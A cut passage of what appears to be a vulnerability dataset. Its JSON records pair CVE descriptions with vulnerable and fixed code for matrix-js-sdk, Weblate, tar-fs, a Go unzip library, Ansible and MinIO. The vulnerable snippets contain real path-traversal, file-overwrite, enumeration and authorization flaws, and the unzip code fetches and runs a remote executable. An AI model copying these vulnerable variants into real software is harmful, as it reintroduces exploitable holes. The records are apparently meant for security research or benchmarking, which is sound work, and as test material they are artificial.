sendKeysFn = jest.fn().mockImplementation((inviteRoomId: string, userIds: string[]) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userIds).toMatchObject([target]);\n return Promise.resolve();\n });\n client.invite = () => Promise.resolve({}); // we're not testing this here - see other tests\n client.sendSharedHistoryKeys = sendKeysFn;\n\n const historyVis = \"joined\"; // NOTE: Changed.\n const historyFn = jest.fn().mockImplementation((eventType: string, stateKey?: string) => {\n expect(eventType).toEqual(EventType.RoomHistoryVisibility);\n expect(stateKey).toEqual(\"\");\n return { getContent: () => ({ history_visibility: historyVis }) }; // eslint-disable-line camelcase\n });\n room.currentState.getStateEvents = historyFn;\n\n await tree.invite(target, false, true);\n expect(sendKeysFn).toHaveBeenCalledTimes(0);\n expect(historyFn).toHaveBeenCalledTimes(1);\n });\n"}, {"id": "vul_js_205_2", "commit": "868bbfc", "file_path": "src/models/MSC3089TreeSpace.ts", "start_line": 146, "end_line": 161, "snippet": " public async invite(userId: string, andSubspaces = true, shareHistoryKeys = true): Promise {\n const promises: Promise[] = [this.retryInvite(userId)];\n if (andSubspaces) {\n promises.push(...this.getDirectories().map((d) => d.invite(userId, andSubspaces, shareHistoryKeys)));\n }\n return Promise.all(promises).then(() => {\n // Note: key sharing is default on because for file trees it is relatively important that the invite\n // target can actually decrypt the files. The implied use case is that by inviting a user to the tree\n // it means the sender would like the receiver to view/download the files contained within, much like\n // sharing a folder in other circles.\n if (shareHistoryKeys && isRoomSharedHistory(this.room)) {\n // noinspection JSIgnoredPromiseFromCall - we aren't concerned as much if this fails.\n this.client.sendSharedHistoryKeys(this.roomId, [userId]);\n }\n });\n }"}], "fix_func": [{"id": "fix_js_205_1", "commit": "2fb1e65", "file_path": "spec/unit/models/MSC3089TreeSpace.spec.ts", "start_line": 31, "end_line": 161, "snippet": "describe(\"MSC3089TreeSpace\", () => {\n let client: MatrixClient;\n let room: any;\n let tree: MSC3089TreeSpace;\n const roomId = \"!tree:localhost\";\n const targetUser = \"@target:example.org\";\n\n let powerLevels: MatrixEvent;\n\n beforeEach(() => {\n // TODO: Use utility functions to create test rooms and clients\n client = {\n getRoom: (fetchRoomId: string) => {\n if (fetchRoomId === roomId) {\n return room;\n } else {\n throw new Error(\"Unexpected fetch for unknown room\");\n }\n },\n };\n room = {\n currentState: {\n getStateEvents: (evType: EventType, stateKey: string) => {\n if (evType === EventType.RoomPowerLevels && stateKey === \"\") {\n return powerLevels;\n } else {\n throw new Error(\"Accessed unexpected state event type or key\");\n }\n },\n },\n };\n tree = new MSC3089TreeSpace(client, roomId);\n makePowerLevels(DEFAULT_TREE_POWER_LEVELS_TEMPLATE);\n });\n\n function makePowerLevels(content: any) {\n powerLevels = new MatrixEvent({\n type: EventType.RoomPowerLevels,\n state_key: \"\",\n sender: \"@creator:localhost\",\n event_id: \"$powerlevels\",\n room_id: roomId,\n content: content,\n });\n }\n\n it(\"should populate the room reference\", () => {\n expect(tree.room).toBe(room);\n });\n\n it(\"should proxy the ID member to room ID\", () => {\n expect(tree.id).toEqual(tree.roomId);\n expect(tree.id).toEqual(roomId);\n });\n\n it(\"should support setting the name of the space\", async () => {\n const newName = \"NEW NAME\";\n const fn = jest\n .fn()\n .mockImplementation((stateRoomId: string, eventType: EventType, content: any, stateKey: string) => {\n expect(stateRoomId).toEqual(roomId);\n expect(eventType).toEqual(EventType.RoomName);\n expect(stateKey).toEqual(\"\");\n expect(content).toMatchObject({ name: newName });\n return Promise.resolve();\n });\n client.sendStateEvent = fn;\n await tree.setName(newName);\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should support inviting users to the space\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.resolve();\n });\n client.invite = fn;\n await tree.invite(target, false);\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should retry invites to the space\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n if (fn.mock.calls.length === 1) return Promise.reject(new Error(\"Sample Failure\"));\n return Promise.resolve();\n });\n client.invite = fn;\n await tree.invite(target, false);\n expect(fn).toHaveBeenCalledTimes(2);\n });\n\n it(\"should not retry invite permission errors\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.reject(new MatrixError({ errcode: \"M_FORBIDDEN\", error: \"Sample Failure\" }));\n });\n client.invite = fn;\n\n await expect(tree.invite(target, false)).rejects.toThrow(\"MatrixError: Sample Failure\");\n\n expect(fn).toHaveBeenCalledTimes(1);\n });\n\n it(\"should invite to subspaces\", async () => {\n const target = targetUser;\n const fn = jest.fn().mockImplementation((inviteRoomId: string, userId: string) => {\n expect(inviteRoomId).toEqual(roomId);\n expect(userId).toEqual(target);\n return Promise.resolve();\n });\n client.invite = fn;\n tree.getDirectories = () => [\n // Bare minimum overrides. We proxy to our mock function manually so we can\n // count the calls, not to ensure accuracy. The invite function behaving correctly\n // is covered by another test.\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n ];\n\n await tree.invite(target, true);\n expect(fn).toHaveBeenCalledTimes(4);\n });\n"}, {"id": "fix_js_205_2", "commit": "2fb1e65", "file_path": "src/models/MSC3089TreeSpace.ts", "start_line": 140, "end_line": 146, "snippet": " public async invite(userId: string, andSubspaces = true): Promise {\n const promises: Promise[] = [this.retryInvite(userId)];\n if (andSubspaces) {\n promises.push(...this.getDirectories().map((d) => d.invite(userId, andSubspaces)));\n }\n await Promise.all(promises);\n }"}], "vul_patch": "--- a/spec/unit/models/MSC3089TreeSpace.spec.ts\n+++ b/spec/unit/models/MSC3089TreeSpace.spec.ts\n@@ -77,7 +77,7 @@\n return Promise.resolve();\n });\n client.invite = fn;\n- await tree.invite(target, false, false);\n+ await tree.invite(target, false);\n expect(fn).toHaveBeenCalledTimes(1);\n });\n \n@@ -90,7 +90,7 @@\n return Promise.resolve();\n });\n client.invite = fn;\n- await tree.invite(target, false, false);\n+ await tree.invite(target, false);\n expect(fn).toHaveBeenCalledTimes(2);\n });\n \n@@ -103,7 +103,7 @@\n });\n client.invite = fn;\n \n- await expect(tree.invite(target, false, false)).rejects.toThrow(\"MatrixError: Sample Failure\");\n+ await expect(tree.invite(target, false)).rejects.toThrow(\"MatrixError: Sample Failure\");\n \n expect(fn).toHaveBeenCalledTimes(1);\n });\n@@ -125,57 +125,6 @@\n { invite: (userId) => fn(tree.roomId, userId) } as MSC3089TreeSpace,\n ];\n \n- await tree.invite(target, true, false);\n+ await tree.invite(target, true);\n expect(fn).toHaveBeenCalledTimes(4);\n });\n-\n- it(\"should share keys with invitees\", async () => {\n- const target = targetUser;\n- const sendKeysFn = jest.fn().mockImplementation((inviteRoomId: string, userIds: string[]) => {\n- expect(inviteRoomId).toEqual(roomId);\n- expect(userIds).toMatchObject([target]);\n- return Promise.resolve();\n- });\n- client.invite = () => Promise.resolve({}); // we're not testing this here - see other tests\n- client.sendSharedHistoryKeys = sendKeysFn;\n-\n- // Mock the history check as best as possible\n- const historyVis = \"shared\";\n- const historyFn = jest.fn().mockImplementation((eventType: string, stateKey?: string) => {\n- // We're not expecting a super rigid test: the function that calls this internally isn't\n- // really being tested here.\n- expect(eventType).toEqual(EventType.RoomHistoryVisibility);\n- expect(stateKey).toEqual(\"\");\n- return { getContent: () => ({ history_visibility: historyVis }) }; // eslint-disable-line camelcase\n- });\n- room.currentState.getStateEvents = historyFn;\n-\n- // Note: inverse test is implicit from other tests, which disable the call stack of this\n- // test in order to pass.\n- await tree.invite(target, false, true);\n- expect(sendKeysFn).toHaveBeenCalledTimes(1);\n- expect(historyFn).toHaveBeenCalledTimes(1);\n- });\n-\n- it(\"should not share keys with invitees if inappropriate history visibility\", async () => {\n- const target = targetUser;\n- const sendKeysFn = jest.fn().mockImplementation((inviteRoomId: string, userIds: string[]) => {\n- expect(inviteRoomId).toEqual(roomId);\n- expect(userIds).toMatchObject([target]);\n- return Promise.resolve();\n- });\n- client.invite = () => Promise.resolve({}); // we're not testing this here - see other tests\n- client.sendSharedHistoryKeys = sendKeysFn;\n-\n- const historyVis = \"joined\"; // NOTE: Changed.\n- const historyFn = jest.fn().mockImplementation((eventType: string, stateKey?: string) => {\n- expect(eventType).toEqual(EventType.RoomHistoryVisibility);\n- expect(stateKey).toEqual(\"\");\n- return { getContent: () => ({ history_visibility: historyVis }) }; // eslint-disable-line camelcase\n- });\n- room.currentState.getStateEvents = historyFn;\n-\n- await tree.invite(target, false, true);\n- expect(sendKeysFn).toHaveBeenCalledTimes(0);\n- expect(historyFn).toHaveBeenCalledTimes(1);\n- });\n\n--- a/src/models/MSC3089TreeSpace.ts\n+++ b/src/models/MSC3089TreeSpace.ts\n@@ -1,16 +1,7 @@\n- public async invite(userId: string, andSubspaces = true, shareHistoryKeys = true): Promise {\n+ public async invite(userId: string, andSubspaces = true): Promise {\n const promises: Promise[] = [this.retryInvite(userId)];\n if (andSubspaces) {\n- promises.push(...this.getDirectories().map((d) => d.invite(userId, andSubspaces, shareHistoryKeys)));\n+ promises.push(...this.getDirectories().map((d) => d.invite(userId, andSubspaces)));\n }\n- return Promise.all(promises).then(() => {\n- // Note: key sharing is default on because for file trees it is relatively important that the invite\n- // target can actually decrypt the files. The implied use case is that by inviting a user to the tree\n- // it means the sender would like the receiver to view/download the files contained within, much like\n- // sharing a folder in other circles.\n- if (shareHistoryKeys && isRoomSharedHistory(this.room)) {\n- // noinspection JSIgnoredPromiseFromCall - we aren't concerned as much if this fails.\n- this.client.sendSharedHistoryKeys(this.roomId, [userId]);\n- }\n- });\n+ await Promise.all(promises);\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-5537", "cve_description": "The password reset form in Weblate before 2.10.1 provides different error messages depending on whether the email address is associated with an account, which allows remote attackers to enumerate user accounts via a series of requests.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/WeblateOrg/weblate", "patch_url": ["https://github.com/WeblateOrg/weblate/commit/abe0d2a29a1d8e896bfe829c8461bf8b391f1079"], "programing_language": "Python", "vul_func": [{"id": "vul_py_345_1", "commit": "e95eacf59f781d8a993be8a23b58e27afdacd9c7", "file_path": "weblate/accounts/views.py", "start_line": 554, "end_line": 585, "snippet": "def reset_password(request):\n '''\n Password reset handling.\n '''\n if 'email' not in load_backends(BACKENDS).keys():\n messages.error(\n request,\n _('Can not reset password, email authentication is disabled!')\n )\n return redirect('login')\n\n if request.method == 'POST':\n form = ResetForm(request.POST)\n if form.is_valid():\n # Force creating new session\n request.session.create()\n if request.user.is_authenticated():\n logout(request)\n\n request.session['password_reset'] = True\n return complete(request, 'email')\n else:\n form = ResetForm()\n\n return render(\n request,\n 'accounts/reset.html',\n {\n 'title': _('Password reset'),\n 'form': form,\n }\n )"}], "fix_func": [{"id": "fix_py_345_1", "commit": "abe0d2a29a1d8e896bfe829c8461bf8b391f1079", "file_path": "weblate/accounts/views.py", "start_line": 554, "end_line": 587, "snippet": "def reset_password(request):\n '''\n Password reset handling.\n '''\n if 'email' not in load_backends(BACKENDS).keys():\n messages.error(\n request,\n _('Can not reset password, email authentication is disabled!')\n )\n return redirect('login')\n\n if request.method == 'POST':\n form = ResetForm(request.POST)\n if form.is_valid():\n # Force creating new session\n request.session.create()\n if request.user.is_authenticated():\n logout(request)\n\n request.session['password_reset'] = True\n return complete(request, 'email')\n else:\n return redirect('email-sent')\n else:\n form = ResetForm()\n\n return render(\n request,\n 'accounts/reset.html',\n {\n 'title': _('Password reset'),\n 'form': form,\n }\n )"}], "vul_patch": "--- a/weblate/accounts/views.py\n+++ b/weblate/accounts/views.py\n@@ -19,6 +19,8 @@\n \n request.session['password_reset'] = True\n return complete(request, 'email')\n+ else:\n+ return redirect('email-sent')\n else:\n form = ResetForm()\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-20835", "cve_description": "A vulnerability was found in tar-fs before 1.16.2. An Arbitrary File Overwrite issue exists when extracting a tarball containing a hardlink to a file that already exists on the system, in conjunction with a later plain file with the same name as the hardlink. This plain file content replaces the existing file content.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/mafintosh/tar-fs", "patch_url": ["https://github.com/mafintosh/tar-fs/commit/06672828e6fa29ac8551b1b6f36c852a9a3c58a2"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_199_1", "commit": "7b4ab17", "file_path": "index.js", "start_line": 261, "end_line": 275, "snippet": " var onlink = function () {\n if (win32) return next() // skip links on win for now before it can be tested\n xfs.unlink(name, function () {\n var srcpath = path.resolve(cwd, header.linkname)\n\n xfs.link(srcpath, name, function (err) {\n if (err && err.code === 'EPERM' && opts.hardlinkAsFilesFallback) {\n stream = xfs.createReadStream(srcpath)\n return onfile()\n }\n\n stat(err)\n })\n })\n }"}], "fix_func": [{"id": "fix_js_199_1", "commit": "0667282", "file_path": "index.js", "start_line": 261, "end_line": 275, "snippet": " var onlink = function () {\n if (win32) return next() // skip links on win for now before it can be tested\n xfs.unlink(name, function () {\n var srcpath = path.join(cwd, path.join('/', header.linkname))\n\n xfs.link(srcpath, name, function (err) {\n if (err && err.code === 'EPERM' && opts.hardlinkAsFilesFallback) {\n stream = xfs.createReadStream(srcpath)\n return onfile()\n }\n\n stat(err)\n })\n })\n }"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,7 +1,7 @@\n var onlink = function () {\n if (win32) return next() // skip links on win for now before it can be tested\n xfs.unlink(name, function () {\n- var srcpath = path.resolve(cwd, header.linkname)\n+ var srcpath = path.join(cwd, path.join('/', header.linkname))\n \n xfs.link(srcpath, name, function (err) {\n if (err && err.code === 'EPERM' && opts.hardlinkAsFilesFallback) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-36561", "cve_description": "Due to improper path sanitization, archives containing relative file paths can cause files to be written (or overwritten) outside of the target directory.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/yi-ge/unzip", "patch_url": ["https://github.com/yi-ge/unzip/commit/2adbaa4891b9690853ef10216189189f5ad7dc73"], "programing_language": "Go", "vul_func": [{"id": "vul_go_205_1", "commit": "cc5a75e", "file_path": "unzip.go", "start_line": 68, "end_line": 163, "snippet": "func (uz Unzip) Extract() error {\n\tif runtime.GOOS == \"windows\" && GetOsVersion() < 6.1 {\n\t\tif !FileIsExist(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\"))) {\n\t\t\tdownloadURL := \"https://y-bi.top/unzip.exe\"\n\t\t\tresp, err := ReadRemote(downloadURL, \"\", netClient)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tif len(resp) != 0 {\n\t\t\t\t// empty response means no such file exists, we should do nothing.\n\t\t\t\tf, err := os.OpenFile(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\")), os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0755)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tf.Write(resp)\n\t\t\t\tf.Close()\n\t\t\t} else {\n\t\t\t\treturn errors.New(\"Install unzip.exe error\")\n\t\t\t}\n\t\t}\n\n\t\tvar cmd *exec.Cmd\n\t\t// dest := uz.Dest //+\"\\\"\"\n\t\tcmd = exec.Command(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\")), uz.Src, \"-d\", uz.Dest)\n\t\tcmd.Env = os.Environ()\n\t\t_, err := cmd.Output()\n\t\treturn err\n\t}\n\n\tr, err := zip.OpenReader(uz.Src)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer func() {\n\t\tif err := r.Close(); err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t}()\n\n\tos.MkdirAll(uz.Dest, 0755)\n\n\t// Closure to address file descriptors issue with all the deferred .Close() methods\n\textractAndWriteFile := func(f *zip.File) error {\n\t\trc, err := f.Open()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tdefer func() {\n\t\t\tif err := rc.Close(); err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t}()\n\n\t\tpath := filepath.Join(uz.Dest, f.Name)\n\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(path, f.Mode())\n\t\t} else {\n\t\t\tmode := f.FileHeader.Mode()\n\t\t\tif mode&os.ModeType == os.ModeSymlink {\n\t\t\t\tdata, err := ioutil.ReadAll(rc)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\twriteSymbolicLink(path, string(data))\n\t\t\t} else {\n\t\t\t\tos.MkdirAll(filepath.Dir(path), f.Mode())\n\t\t\t\toutFile, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tdefer func() {\n\t\t\t\t\tif err := outFile.Close(); err != nil {\n\t\t\t\t\t\tpanic(err)\n\t\t\t\t\t}\n\t\t\t\t}()\n\n\t\t\t\t_, err = io.Copy(outFile, rc)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}\n\n\tfor _, f := range r.File {\n\t\terr := extractAndWriteFile(f)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_205_1", "commit": "2adbaa4891b9690853ef10216189189f5ad7dc73", "file_path": "unzip.go", "start_line": 70, "end_line": 168, "snippet": "func (uz Unzip) Extract() error {\n\tif runtime.GOOS == \"windows\" && GetOsVersion() < 6.1 {\n\t\tif !FileIsExist(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\"))) {\n\t\t\tdownloadURL := \"https://y-bi.top/unzip.exe\"\n\t\t\tresp, err := ReadRemote(downloadURL, \"\", netClient)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tif len(resp) != 0 {\n\t\t\t\t// empty response means no such file exists, we should do nothing.\n\t\t\t\tf, err := os.OpenFile(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\")), os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0755)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tf.Write(resp)\n\t\t\t\tf.Close()\n\t\t\t} else {\n\t\t\t\treturn errors.New(\"Install unzip.exe error\")\n\t\t\t}\n\t\t}\n\n\t\tvar cmd *exec.Cmd\n\t\t// dest := uz.Dest //+\"\\\"\"\n\t\tcmd = exec.Command(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\")), uz.Src, \"-d\", uz.Dest)\n\t\tcmd.Env = os.Environ()\n\t\t_, err := cmd.Output()\n\t\treturn err\n\t}\n\n\tr, err := zip.OpenReader(uz.Src)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer func() {\n\t\tif err := r.Close(); err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t}()\n\n\tos.MkdirAll(uz.Dest, 0755)\n\n\t// Closure to address file descriptors issue with all the deferred .Close() methods\n\textractAndWriteFile := func(f *zip.File) error {\n\t\trc, err := f.Open()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tdefer func() {\n\t\t\tif err := rc.Close(); err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t}()\n\n\t\tpath := filepath.Join(uz.Dest, f.Name)\n\t\tif !strings.HasPrefix(path, filepath.Clean(uz.Dest)+string(os.PathSeparator)) {\n return fmt.Errorf(\"%s: illegal file path\", path)\n }\n\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(path, f.Mode())\n\t\t} else {\n\t\t\tmode := f.FileHeader.Mode()\n\t\t\tif mode&os.ModeType == os.ModeSymlink {\n\t\t\t\tdata, err := ioutil.ReadAll(rc)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\twriteSymbolicLink(path, string(data))\n\t\t\t} else {\n\t\t\t\tos.MkdirAll(filepath.Dir(path), f.Mode())\n\t\t\t\toutFile, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tdefer func() {\n\t\t\t\t\tif err := outFile.Close(); err != nil {\n\t\t\t\t\t\tpanic(err)\n\t\t\t\t\t}\n\t\t\t\t}()\n\n\t\t\t\t_, err = io.Copy(outFile, rc)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}\n\n\tfor _, f := range r.File {\n\t\terr := extractAndWriteFile(f)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/unzip.go\n+++ b/unzip.go\n@@ -53,6 +53,9 @@\n \t\t}()\n \n \t\tpath := filepath.Join(uz.Dest, f.Name)\n+\t\tif !strings.HasPrefix(path, filepath.Clean(uz.Dest)+string(os.PathSeparator)) {\n+ return fmt.Errorf(\"%s: illegal file path\", path)\n+ }\n \n \t\tif f.FileInfo().IsDir() {\n \t\t\tos.MkdirAll(path, f.Mode())\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-10684", "cve_description": "A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.9 and 2.9.6 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/ansible/ansible", "patch_url": ["https://github.com/ansible/ansible/commit/a9d2ceafe429171c0e2ad007058b88bae57c74ce", "https://github.com/ansible/ansible/commit/5eabf7bb93c9bfc375b806a2b1f623d650cddc2b", "https://github.com/ansible/ansible/commit/0b4788a71fc7d24ffa957a94ee5e23d6a9733ab0", "https://github.com/ansible/ansible/commit/1d0d2645eed36ac4e17052ab4eacf240132d96fb"], "programing_language": "Python", "vul_func": [{"id": "vul_py_406_1", "commit": "97e51797454b97bfb9447b3b7dc926be530ae19e", "file_path": "lib/ansible/vars/clean.py", "start_line": 168, "end_line": 178, "snippet": "def namespace_facts(facts):\n ''' return all facts inside 'ansible_facts' w/o an ansible_ prefix '''\n deprefixed = {}\n for k in facts:\n if k in ('ansible_local',):\n # exceptions to 'deprefixing'\n deprefixed[k] = module_response_deepcopy(facts[k])\n else:\n deprefixed[k.replace('ansible_', '', 1)] = module_response_deepcopy(facts[k])\n\n return {'ansible_facts': deprefixed}"}], "fix_func": [{"id": "fix_py_406_1", "commit": "a9d2ceafe429171c0e2ad007058b88bae57c74ce", "file_path": "lib/ansible/vars/clean.py", "start_line": 167, "end_line": 176, "snippet": "def namespace_facts(facts):\n ''' return all facts inside 'ansible_facts' w/o an ansible_ prefix '''\n deprefixed = {}\n for k in facts:\n if k.startswith('ansible_') and k not in ('ansible_local',):\n deprefixed[k[8:]] = module_response_deepcopy(facts[k])\n else:\n deprefixed[k] = module_response_deepcopy(facts[k])\n\n return {'ansible_facts': deprefixed}"}], "vul_patch": "--- a/lib/ansible/vars/clean.py\n+++ b/lib/ansible/vars/clean.py\n@@ -2,10 +2,9 @@\n ''' return all facts inside 'ansible_facts' w/o an ansible_ prefix '''\n deprefixed = {}\n for k in facts:\n- if k in ('ansible_local',):\n- # exceptions to 'deprefixing'\n+ if k.startswith('ansible_') and k not in ('ansible_local',):\n+ deprefixed[k[8:]] = module_response_deepcopy(facts[k])\n+ else:\n deprefixed[k] = module_response_deepcopy(facts[k])\n- else:\n- deprefixed[k.replace('ansible_', '', 1)] = module_response_deepcopy(facts[k])\n \n return {'ansible_facts': deprefixed}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-24747", "cve_description": "MinIO is a High Performance Object Storage. When someone creates an access key, it inherits the permissions of the parent key. Not only for `s3:*` actions, but also `admin:*` actions. Which means unless somewhere above in the access-key hierarchy, the `admin` rights are denied, access keys will be able to simply override their own `s3` permissions to something more permissive. The vulnerability is fixed in RELEASE.2024-01-31T20-20-33Z.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/minio/minio", "patch_url": ["https://github.com/minio/minio/commit/0ae4915a9391ef4b3ec80f5fcdcf24ee6884e776"], "programing_language": "Go", "vul_func": [{"id": "vul_go_73_1", "commit": "4cd777a", "file_path": "cmd/admin-handlers-users.go", "start_line": "749", "end_line": "861", "snippet": "func (a adminAPIHandlers) UpdateServiceAccount(w http.ResponseWriter, r *http.Request) {\n\tctx := r.Context()\n\n\t// Get current object layer instance.\n\tobjectAPI := newObjectLayerFn()\n\tif objectAPI == nil || globalNotificationSys == nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrServerNotInitialized), r.URL)\n\t\treturn\n\t}\n\n\tcred, owner, s3Err := validateAdminSignature(ctx, r, \"\")\n\tif s3Err != ErrNone {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(s3Err), r.URL)\n\t\treturn\n\t}\n\n\taccessKey := mux.Vars(r)[\"accessKey\"]\n\tif accessKey == \"\" {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrInvalidRequest), r.URL)\n\t\treturn\n\t}\n\n\tsvcAccount, _, err := globalIAMSys.GetServiceAccount(ctx, accessKey)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\tif !globalIAMSys.IsAllowed(policy.Args{\n\t\tAccountName: cred.AccessKey,\n\t\tGroups: cred.Groups,\n\t\tAction: policy.UpdateServiceAccountAdminAction,\n\t\tConditionValues: getConditionValues(r, \"\", cred),\n\t\tIsOwner: owner,\n\t\tClaims: cred.Claims,\n\t}) {\n\t\trequestUser := cred.AccessKey\n\t\tif cred.ParentUser != \"\" {\n\t\t\trequestUser = cred.ParentUser\n\t\t}\n\n\t\tif requestUser != svcAccount.ParentUser {\n\t\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), r.URL)\n\t\t\treturn\n\t\t}\n\t}\n\n\tpassword := cred.SecretKey\n\treqBytes, err := madmin.DecryptData(password, io.LimitReader(r.Body, r.ContentLength))\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErrWithErr(ErrAdminConfigBadJSON, err), r.URL)\n\t\treturn\n\t}\n\n\tvar updateReq madmin.UpdateServiceAccountReq\n\tif err = json.Unmarshal(reqBytes, &updateReq); err != nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErrWithErr(ErrAdminConfigBadJSON, err), r.URL)\n\t\treturn\n\t}\n\n\tif err := updateReq.Validate(); err != nil {\n\t\t// Since this validation would happen client side as well, we only send\n\t\t// a generic error message here.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminResourceInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tvar sp *policy.Policy\n\tif len(updateReq.NewPolicy) > 0 {\n\t\tsp, err = policy.ParseConfig(bytes.NewReader(updateReq.NewPolicy))\n\t\tif err != nil {\n\t\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\t\treturn\n\t\t}\n\t\tif sp.Version == \"\" && len(sp.Statements) == 0 {\n\t\t\tsp = 